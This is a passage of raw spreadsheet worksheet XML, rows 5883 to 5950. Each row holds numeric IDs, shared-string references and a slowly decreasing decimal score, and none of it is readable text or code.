      <c r="F5883" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5884" ht="15.75" customHeight="1">
      <c r="A5884" s="1">
        <v>32629.0</v>
      </c>
      <c r="B5884" s="2">
        <v>5849751.0</v>
      </c>
      <c r="C5884" s="2" t="s">
        <v>5609</v>
      </c>
      <c r="D5884" s="2">
        <v>1.0</v>
      </c>
      <c r="E5884" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5884" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="5885" ht="15.75" customHeight="1">
      <c r="A5885" s="1">
        <v>17272.0</v>
      </c>
      <c r="B5885" s="2">
        <v>4.9182103E7</v>
      </c>
      <c r="C5885" s="2" t="s">
        <v>5610</v>
      </c>
      <c r="D5885" s="2">
        <v>1.0</v>
      </c>
      <c r="E5885" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5885" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="5886" ht="15.75" customHeight="1">
      <c r="A5886" s="1">
        <v>21656.0</v>
      </c>
      <c r="B5886" s="2">
        <v>2.4940758E7</v>
      </c>
      <c r="C5886" s="2" t="s">
        <v>5611</v>
      </c>
      <c r="D5886" s="2">
        <v>1.0</v>
      </c>
      <c r="E5886" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5886" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="5887" ht="15.75" customHeight="1">
      <c r="A5887" s="1">
        <v>30640.0</v>
      </c>
      <c r="B5887" s="2">
        <v>4.1581086E7</v>
      </c>
      <c r="C5887" s="2" t="s">
        <v>5612</v>
      </c>
      <c r="D5887" s="2">
        <v>1.0</v>
      </c>
      <c r="E5887" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5887" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="5888" ht="15.75" customHeight="1">
      <c r="A5888" s="1">
        <v>25325.0</v>
      </c>
      <c r="B5888" s="2">
        <v>1.3467435E7</v>
      </c>
      <c r="C5888" s="2" t="s">
        <v>5613</v>
      </c>
      <c r="D5888" s="2">
        <v>1.0</v>
      </c>
      <c r="E5888" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5888" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="5889" ht="15.75" customHeight="1">
      <c r="A5889" s="1">
        <v>31028.0</v>
      </c>
      <c r="B5889" s="2">
        <v>4.7795099E7</v>
      </c>
      <c r="C5889" s="2" t="s">
        <v>5614</v>
      </c>
      <c r="D5889" s="2">
        <v>1.0</v>
      </c>
      <c r="E5889" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5889" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="5890" ht="15.75" customHeight="1">
      <c r="A5890" s="1">
        <v>31912.0</v>
      </c>
      <c r="B5890" s="2">
        <v>5.3007525E7</v>
      </c>
      <c r="C5890" s="2" t="s">
        <v>5615</v>
      </c>
      <c r="D5890" s="2">
        <v>1.0</v>
      </c>
      <c r="E5890" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5890" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="5891" ht="15.75" customHeight="1">
      <c r="A5891" s="1">
        <v>27360.0</v>
      </c>
      <c r="B5891" s="2">
        <v>2.1641693E7</v>
      </c>
      <c r="C5891" s="2" t="s">
        <v>5616</v>
      </c>
      <c r="D5891" s="2">
        <v>1.0</v>
      </c>
      <c r="E5891" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5891" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="5892" ht="15.75" customHeight="1">
      <c r="A5892" s="1">
        <v>20174.0</v>
      </c>
      <c r="B5892" s="2">
        <v>1.0435517E7</v>
      </c>
      <c r="C5892" s="2" t="s">
        <v>5617</v>
      </c>
      <c r="D5892" s="2">
        <v>1.0</v>
      </c>
      <c r="E5892" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5892" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5893" ht="15.75" customHeight="1">
      <c r="A5893" s="1">
        <v>21367.0</v>
      </c>
      <c r="B5893" s="2">
        <v>2.147601E7</v>
      </c>
      <c r="C5893" s="2" t="s">
        <v>5618</v>
      </c>
      <c r="D5893" s="2">
        <v>1.0</v>
      </c>
      <c r="E5893" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5893" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5894" ht="15.75" customHeight="1">
      <c r="A5894" s="1">
        <v>24889.0</v>
      </c>
      <c r="B5894" s="2">
        <v>1.2255915E7</v>
      </c>
      <c r="C5894" s="2" t="s">
        <v>5619</v>
      </c>
      <c r="D5894" s="2">
        <v>1.0</v>
      </c>
      <c r="E5894" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5894" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5895" ht="15.75" customHeight="1">
      <c r="A5895" s="1">
        <v>26371.0</v>
      </c>
      <c r="B5895" s="2">
        <v>1.6888961E7</v>
      </c>
      <c r="C5895" s="2" t="s">
        <v>5620</v>
      </c>
      <c r="D5895" s="2">
        <v>1.0</v>
      </c>
      <c r="E5895" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5895" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5896" ht="15.75" customHeight="1">
      <c r="A5896" s="1">
        <v>30904.0</v>
      </c>
      <c r="B5896" s="2">
        <v>4.675681E7</v>
      </c>
      <c r="C5896" s="2" t="s">
        <v>5621</v>
      </c>
      <c r="D5896" s="2">
        <v>1.0</v>
      </c>
      <c r="E5896" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5896" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5897" ht="15.75" customHeight="1">
      <c r="A5897" s="1">
        <v>32954.0</v>
      </c>
      <c r="B5897" s="2">
        <v>6497756.0</v>
      </c>
      <c r="C5897" s="2" t="s">
        <v>5622</v>
      </c>
      <c r="D5897" s="2">
        <v>1.0</v>
      </c>
      <c r="E5897" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5897" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="5898" ht="15.75" customHeight="1">
      <c r="A5898" s="1">
        <v>20603.0</v>
      </c>
      <c r="B5898" s="2">
        <v>1.3879457E7</v>
      </c>
      <c r="C5898" s="2" t="s">
        <v>5623</v>
      </c>
      <c r="D5898" s="2">
        <v>1.0</v>
      </c>
      <c r="E5898" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5898" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="5899" ht="15.75" customHeight="1">
      <c r="A5899" s="1">
        <v>26285.0</v>
      </c>
      <c r="B5899" s="2">
        <v>1.644982E7</v>
      </c>
      <c r="C5899" s="2" t="s">
        <v>5624</v>
      </c>
      <c r="D5899" s="2">
        <v>1.0</v>
      </c>
      <c r="E5899" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5899" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="5900" ht="15.75" customHeight="1">
      <c r="A5900" s="1">
        <v>29181.0</v>
      </c>
      <c r="B5900" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C5900" s="2" t="s">
        <v>5625</v>
      </c>
      <c r="D5900" s="2">
        <v>1.0</v>
      </c>
      <c r="E5900" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5900" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="5901" ht="15.75" customHeight="1">
      <c r="A5901" s="1">
        <v>32575.0</v>
      </c>
      <c r="B5901" s="2">
        <v>5769898.0</v>
      </c>
      <c r="C5901" s="2" t="s">
        <v>5626</v>
      </c>
      <c r="D5901" s="2">
        <v>1.0</v>
      </c>
      <c r="E5901" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5901" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="5902" ht="15.75" customHeight="1">
      <c r="A5902" s="1">
        <v>20279.0</v>
      </c>
      <c r="B5902" s="2">
        <v>1.115869E7</v>
      </c>
      <c r="C5902" s="2" t="s">
        <v>5627</v>
      </c>
      <c r="D5902" s="2">
        <v>1.0</v>
      </c>
      <c r="E5902" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5902" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="5903" ht="15.75" customHeight="1">
      <c r="A5903" s="1">
        <v>21613.0</v>
      </c>
      <c r="B5903" s="2">
        <v>2.4510187E7</v>
      </c>
      <c r="C5903" s="2" t="s">
        <v>5628</v>
      </c>
      <c r="D5903" s="2">
        <v>1.0</v>
      </c>
      <c r="E5903" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5903" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="5904" ht="15.75" customHeight="1">
      <c r="A5904" s="1">
        <v>29823.0</v>
      </c>
      <c r="B5904" s="2">
        <v>3.5303698E7</v>
      </c>
      <c r="C5904" s="2" t="s">
        <v>5629</v>
      </c>
      <c r="D5904" s="2">
        <v>1.0</v>
      </c>
      <c r="E5904" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5904" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="5905" ht="15.75" customHeight="1">
      <c r="A5905" s="1">
        <v>22357.0</v>
      </c>
      <c r="B5905" s="2">
        <v>3.4656752E7</v>
      </c>
      <c r="C5905" s="2" t="s">
        <v>5630</v>
      </c>
      <c r="D5905" s="2">
        <v>1.0</v>
      </c>
      <c r="E5905" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5905" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="5906" ht="15.75" customHeight="1">
      <c r="A5906" s="1">
        <v>22857.0</v>
      </c>
      <c r="B5906" s="2">
        <v>4.7113831E7</v>
      </c>
      <c r="C5906" s="2" t="s">
        <v>5631</v>
      </c>
      <c r="D5906" s="2">
        <v>1.0</v>
      </c>
      <c r="E5906" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5906" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="5907" ht="15.75" customHeight="1">
      <c r="A5907" s="1">
        <v>27730.0</v>
      </c>
      <c r="B5907" s="2">
        <v>2.308002E7</v>
      </c>
      <c r="C5907" s="2" t="s">
        <v>5632</v>
      </c>
      <c r="D5907" s="2">
        <v>1.0</v>
      </c>
      <c r="E5907" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5907" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="5908" ht="15.75" customHeight="1">
      <c r="A5908" s="1">
        <v>29398.0</v>
      </c>
      <c r="B5908" s="2">
        <v>3.1958058E7</v>
      </c>
      <c r="C5908" s="2" t="s">
        <v>5633</v>
      </c>
      <c r="D5908" s="2">
        <v>1.0</v>
      </c>
      <c r="E5908" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5908" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="5909" ht="15.75" customHeight="1">
      <c r="A5909" s="1">
        <v>28684.0</v>
      </c>
      <c r="B5909" s="2">
        <v>2.7578109E7</v>
      </c>
      <c r="C5909" s="2" t="s">
        <v>5634</v>
      </c>
      <c r="D5909" s="2">
        <v>1.0</v>
      </c>
      <c r="E5909" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5909" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="5910" ht="15.75" customHeight="1">
      <c r="A5910" s="1">
        <v>29051.0</v>
      </c>
      <c r="B5910" s="2">
        <v>3.0235024E7</v>
      </c>
      <c r="C5910" s="2" t="s">
        <v>686</v>
      </c>
      <c r="D5910" s="2">
        <v>1.0</v>
      </c>
      <c r="E5910" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5910" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="5911" ht="15.75" customHeight="1">
      <c r="A5911" s="1">
        <v>28930.0</v>
      </c>
      <c r="B5911" s="2">
        <v>2.9569796E7</v>
      </c>
      <c r="C5911" s="2" t="s">
        <v>5635</v>
      </c>
      <c r="D5911" s="2">
        <v>1.0</v>
      </c>
      <c r="E5911" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5911" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="5912" ht="15.75" customHeight="1">
      <c r="A5912" s="1">
        <v>30371.0</v>
      </c>
      <c r="B5912" s="2">
        <v>3.8422127E7</v>
      </c>
      <c r="C5912" s="2" t="s">
        <v>5636</v>
      </c>
      <c r="D5912" s="2">
        <v>1.0</v>
      </c>
      <c r="E5912" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5912" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="5913" ht="15.75" customHeight="1">
      <c r="A5913" s="1">
        <v>30015.0</v>
      </c>
      <c r="B5913" s="2">
        <v>3.6159125E7</v>
      </c>
      <c r="C5913" s="2" t="s">
        <v>5637</v>
      </c>
      <c r="D5913" s="2">
        <v>1.0</v>
      </c>
      <c r="E5913" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5913" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="5914" ht="15.75" customHeight="1">
      <c r="A5914" s="1">
        <v>21042.0</v>
      </c>
      <c r="B5914" s="2">
        <v>1.76416E7</v>
      </c>
      <c r="C5914" s="2" t="s">
        <v>5638</v>
      </c>
      <c r="D5914" s="2">
        <v>1.0</v>
      </c>
      <c r="E5914" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5914" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="5915" ht="15.75" customHeight="1">
      <c r="A5915" s="1">
        <v>21904.0</v>
      </c>
      <c r="B5915" s="2">
        <v>2.7984407E7</v>
      </c>
      <c r="C5915" s="2" t="s">
        <v>5639</v>
      </c>
      <c r="D5915" s="2">
        <v>1.0</v>
      </c>
      <c r="E5915" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5915" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="5916" ht="15.75" customHeight="1">
      <c r="A5916" s="1">
        <v>23468.0</v>
      </c>
      <c r="B5916" s="2">
        <v>5.7159609E7</v>
      </c>
      <c r="C5916" s="2" t="s">
        <v>5640</v>
      </c>
      <c r="D5916" s="2">
        <v>1.0</v>
      </c>
      <c r="E5916" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5916" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="5917" ht="15.75" customHeight="1">
      <c r="A5917" s="1">
        <v>26394.0</v>
      </c>
      <c r="B5917" s="2">
        <v>1.700753E7</v>
      </c>
      <c r="C5917" s="2" t="s">
        <v>5641</v>
      </c>
      <c r="D5917" s="2">
        <v>1.0</v>
      </c>
      <c r="E5917" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5917" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="5918" ht="15.75" customHeight="1">
      <c r="A5918" s="1">
        <v>27380.0</v>
      </c>
      <c r="B5918" s="2">
        <v>2.1749067E7</v>
      </c>
      <c r="C5918" s="2" t="s">
        <v>5642</v>
      </c>
      <c r="D5918" s="2">
        <v>1.0</v>
      </c>
      <c r="E5918" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5918" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="5919" ht="15.75" customHeight="1">
      <c r="A5919" s="1">
        <v>22322.0</v>
      </c>
      <c r="B5919" s="2">
        <v>3.3998282E7</v>
      </c>
      <c r="C5919" s="2" t="s">
        <v>5643</v>
      </c>
      <c r="D5919" s="2">
        <v>1.0</v>
      </c>
      <c r="E5919" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5919" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="5920" ht="15.75" customHeight="1">
      <c r="A5920" s="1">
        <v>27846.0</v>
      </c>
      <c r="B5920" s="2">
        <v>2.3425148E7</v>
      </c>
      <c r="C5920" s="2" t="s">
        <v>5644</v>
      </c>
      <c r="D5920" s="2">
        <v>1.0</v>
      </c>
      <c r="E5920" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5920" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="5921" ht="15.75" customHeight="1">
      <c r="A5921" s="1">
        <v>22036.0</v>
      </c>
      <c r="B5921" s="2">
        <v>3.0196318E7</v>
      </c>
      <c r="C5921" s="2" t="s">
        <v>5645</v>
      </c>
      <c r="D5921" s="2">
        <v>1.0</v>
      </c>
      <c r="E5921" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5921" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="5922" ht="15.75" customHeight="1">
      <c r="A5922" s="1">
        <v>24664.0</v>
      </c>
      <c r="B5922" s="2">
        <v>1.1541643E7</v>
      </c>
      <c r="C5922" s="2" t="s">
        <v>5646</v>
      </c>
      <c r="D5922" s="2">
        <v>1.0</v>
      </c>
      <c r="E5922" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5922" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="5923" ht="15.75" customHeight="1">
      <c r="A5923" s="1">
        <v>26642.0</v>
      </c>
      <c r="B5923" s="2">
        <v>1.8048254E7</v>
      </c>
      <c r="C5923" s="2" t="s">
        <v>5647</v>
      </c>
      <c r="D5923" s="2">
        <v>1.0</v>
      </c>
      <c r="E5923" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5923" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="5924" ht="15.75" customHeight="1">
      <c r="A5924" s="1">
        <v>30229.0</v>
      </c>
      <c r="B5924" s="2">
        <v>3.7432788E7</v>
      </c>
      <c r="C5924" s="2" t="s">
        <v>5648</v>
      </c>
      <c r="D5924" s="2">
        <v>1.0</v>
      </c>
      <c r="E5924" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5924" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="5925" ht="15.75" customHeight="1">
      <c r="A5925" s="1">
        <v>28068.0</v>
      </c>
      <c r="B5925" s="2">
        <v>2.4621234E7</v>
      </c>
      <c r="C5925" s="2" t="s">
        <v>5649</v>
      </c>
      <c r="D5925" s="2">
        <v>1.0</v>
      </c>
      <c r="E5925" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5925" s="2">
        <v>0.1305916305916306</v>
      </c>
    </row>
    <row r="5926" ht="15.75" customHeight="1">
      <c r="A5926" s="1">
        <v>20942.0</v>
      </c>
      <c r="B5926" s="2">
        <v>1.6556717E7</v>
      </c>
      <c r="C5926" s="2" t="s">
        <v>5650</v>
      </c>
      <c r="D5926" s="2">
        <v>1.0</v>
      </c>
      <c r="E5926" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5926" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="5927" ht="15.75" customHeight="1">
      <c r="A5927" s="1">
        <v>27728.0</v>
      </c>
      <c r="B5927" s="2">
        <v>2.3079841E7</v>
      </c>
      <c r="C5927" s="2" t="s">
        <v>5651</v>
      </c>
      <c r="D5927" s="2">
        <v>1.0</v>
      </c>
      <c r="E5927" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5927" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="5928" ht="15.75" customHeight="1">
      <c r="A5928" s="1">
        <v>29363.0</v>
      </c>
      <c r="B5928" s="2">
        <v>3.1660822E7</v>
      </c>
      <c r="C5928" s="2" t="s">
        <v>5652</v>
      </c>
      <c r="D5928" s="2">
        <v>1.0</v>
      </c>
      <c r="E5928" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5928" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="5929" ht="15.75" customHeight="1">
      <c r="A5929" s="1">
        <v>14406.0</v>
      </c>
      <c r="B5929" s="2">
        <v>3.9191699E7</v>
      </c>
      <c r="C5929" s="2" t="s">
        <v>5653</v>
      </c>
      <c r="D5929" s="2">
        <v>1.0</v>
      </c>
      <c r="E5929" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5929" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5930" ht="15.75" customHeight="1">
      <c r="A5930" s="1">
        <v>23448.0</v>
      </c>
      <c r="B5930" s="2">
        <v>5678004.0</v>
      </c>
      <c r="C5930" s="2" t="s">
        <v>5654</v>
      </c>
      <c r="D5930" s="2">
        <v>1.0</v>
      </c>
      <c r="E5930" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5930" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5931" ht="15.75" customHeight="1">
      <c r="A5931" s="1">
        <v>25266.0</v>
      </c>
      <c r="B5931" s="2">
        <v>1.3391464E7</v>
      </c>
      <c r="C5931" s="2" t="s">
        <v>5655</v>
      </c>
      <c r="D5931" s="2">
        <v>1.0</v>
      </c>
      <c r="E5931" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5931" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5932" ht="15.75" customHeight="1">
      <c r="A5932" s="1">
        <v>25583.0</v>
      </c>
      <c r="B5932" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C5932" s="2" t="s">
        <v>5656</v>
      </c>
      <c r="D5932" s="2">
        <v>1.0</v>
      </c>
      <c r="E5932" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5932" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5933" ht="15.75" customHeight="1">
      <c r="A5933" s="1">
        <v>25755.0</v>
      </c>
      <c r="B5933" s="2">
        <v>1.4603991E7</v>
      </c>
      <c r="C5933" s="2" t="s">
        <v>5657</v>
      </c>
      <c r="D5933" s="2">
        <v>1.0</v>
      </c>
      <c r="E5933" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5933" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5934" ht="15.75" customHeight="1">
      <c r="A5934" s="1">
        <v>25854.0</v>
      </c>
      <c r="B5934" s="2">
        <v>1.4875948E7</v>
      </c>
      <c r="C5934" s="2" t="s">
        <v>5658</v>
      </c>
      <c r="D5934" s="2">
        <v>1.0</v>
      </c>
      <c r="E5934" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5934" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5935" ht="15.75" customHeight="1">
      <c r="A5935" s="1">
        <v>27368.0</v>
      </c>
      <c r="B5935" s="2">
        <v>2.1679164E7</v>
      </c>
      <c r="C5935" s="2" t="s">
        <v>5659</v>
      </c>
      <c r="D5935" s="2">
        <v>1.0</v>
      </c>
      <c r="E5935" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5935" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5936" ht="15.75" customHeight="1">
      <c r="A5936" s="1">
        <v>28898.0</v>
      </c>
      <c r="B5936" s="2">
        <v>2.9329273E7</v>
      </c>
      <c r="C5936" s="2" t="s">
        <v>5660</v>
      </c>
      <c r="D5936" s="2">
        <v>1.0</v>
      </c>
      <c r="E5936" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5936" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5937" ht="15.75" customHeight="1">
      <c r="A5937" s="1">
        <v>28918.0</v>
      </c>
      <c r="B5937" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C5937" s="2" t="s">
        <v>5661</v>
      </c>
      <c r="D5937" s="2">
        <v>1.0</v>
      </c>
      <c r="E5937" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5937" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5938" ht="15.75" customHeight="1">
      <c r="A5938" s="1">
        <v>29468.0</v>
      </c>
      <c r="B5938" s="2">
        <v>3.2349615E7</v>
      </c>
      <c r="C5938" s="2" t="s">
        <v>5662</v>
      </c>
      <c r="D5938" s="2">
        <v>1.0</v>
      </c>
      <c r="E5938" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5938" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5939" ht="15.75" customHeight="1">
      <c r="A5939" s="1">
        <v>29913.0</v>
      </c>
      <c r="B5939" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C5939" s="2" t="s">
        <v>5663</v>
      </c>
      <c r="D5939" s="2">
        <v>1.0</v>
      </c>
      <c r="E5939" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5939" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5940" ht="15.75" customHeight="1">
      <c r="A5940" s="1">
        <v>30084.0</v>
      </c>
      <c r="B5940" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C5940" s="2" t="s">
        <v>5664</v>
      </c>
      <c r="D5940" s="2">
        <v>1.0</v>
      </c>
      <c r="E5940" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5940" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5941" ht="15.75" customHeight="1">
      <c r="A5941" s="1">
        <v>30257.0</v>
      </c>
      <c r="B5941" s="2">
        <v>3.7606609E7</v>
      </c>
      <c r="C5941" s="2" t="s">
        <v>5665</v>
      </c>
      <c r="D5941" s="2">
        <v>1.0</v>
      </c>
      <c r="E5941" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5941" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5942" ht="15.75" customHeight="1">
      <c r="A5942" s="1">
        <v>31723.0</v>
      </c>
      <c r="B5942" s="2">
        <v>5.2122141E7</v>
      </c>
      <c r="C5942" s="2" t="s">
        <v>5666</v>
      </c>
      <c r="D5942" s="2">
        <v>1.0</v>
      </c>
      <c r="E5942" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5942" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5943" ht="15.75" customHeight="1">
      <c r="A5943" s="1">
        <v>31919.0</v>
      </c>
      <c r="B5943" s="2">
        <v>5303282.0</v>
      </c>
      <c r="C5943" s="2" t="s">
        <v>5667</v>
      </c>
      <c r="D5943" s="2">
        <v>1.0</v>
      </c>
      <c r="E5943" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5943" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5944" ht="15.75" customHeight="1">
      <c r="A5944" s="1">
        <v>32024.0</v>
      </c>
      <c r="B5944" s="2">
        <v>5.3591903E7</v>
      </c>
      <c r="C5944" s="2" t="s">
        <v>5668</v>
      </c>
      <c r="D5944" s="2">
        <v>1.0</v>
      </c>
      <c r="E5944" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5944" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5945" ht="15.75" customHeight="1">
      <c r="A5945" s="1">
        <v>32463.0</v>
      </c>
      <c r="B5945" s="2">
        <v>5678003.0</v>
      </c>
      <c r="C5945" s="2" t="s">
        <v>5654</v>
      </c>
      <c r="D5945" s="2">
        <v>1.0</v>
      </c>
      <c r="E5945" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5945" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5946" ht="15.75" customHeight="1">
      <c r="A5946" s="1">
        <v>33130.0</v>
      </c>
      <c r="B5946" s="2">
        <v>7051213.0</v>
      </c>
      <c r="C5946" s="2" t="s">
        <v>5669</v>
      </c>
      <c r="D5946" s="2">
        <v>1.0</v>
      </c>
      <c r="E5946" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5946" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5947" ht="15.75" customHeight="1">
      <c r="A5947" s="1">
        <v>33300.0</v>
      </c>
      <c r="B5947" s="2">
        <v>7491061.0</v>
      </c>
      <c r="C5947" s="2" t="s">
        <v>5670</v>
      </c>
      <c r="D5947" s="2">
        <v>1.0</v>
      </c>
      <c r="E5947" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5947" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5948" ht="15.75" customHeight="1">
      <c r="A5948" s="1">
        <v>33831.0</v>
      </c>
      <c r="B5948" s="2">
        <v>8960543.0</v>
      </c>
      <c r="C5948" s="2" t="s">
        <v>5671</v>
      </c>
      <c r="D5948" s="2">
        <v>1.0</v>
      </c>
      <c r="E5948" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5948" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5949" ht="15.75" customHeight="1">
      <c r="A5949" s="1">
        <v>34034.0</v>
      </c>
      <c r="B5949" s="2">
        <v>9555711.0</v>
      </c>
      <c r="C5949" s="2" t="s">
        <v>5672</v>
      </c>
      <c r="D5949" s="2">
        <v>1.0</v>
      </c>
      <c r="E5949" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5949" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="5950" ht="15.75" customHeight="1">
      <c r="A5950" s="1">
        <v>24239.0</v>
      </c>
      <c r="B5950" s="2">
        <v>1.0475889E7</v>
      </c>
      <c r="C5950" s="2" t="s">
        <v>5673</v>
      </c>
      <c r="D5950" s="2">
        <v>1.0</v>
      </c>
      <c r="E5950" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5950" s="2">
